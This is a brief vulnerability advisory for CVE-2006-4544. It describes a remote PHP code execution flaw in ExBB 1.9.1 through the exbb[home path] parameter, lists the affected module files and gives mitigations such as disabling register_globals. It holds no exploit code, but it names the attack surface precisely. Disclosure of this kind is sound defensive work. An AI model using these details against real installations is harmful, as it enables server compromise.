CVE-2006-4544

Name of the Vulnerable Software and Affected Versions ExBB version 1.9.1

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the exbb[home path] parameter in various files within the modules directory, including /birstday/birst.php, /birstday/select.php, /birstday/profile show.php, /newusergreatings/pm newreg.php, /punish/p error.php, /punish/profile.php, and /threadstop/threadstop.php. This is possible when register globals is enabled.

Recommendations For ExBB version 1.9.1, consider disabling the register globals setting to prevent exploitation. Additionally, restrict access to the vulnerable modules, including birstday, newusergreatings, punish, and threadstop, until a patch is available. Avoid using the exbb[home path] parameter in the affected files.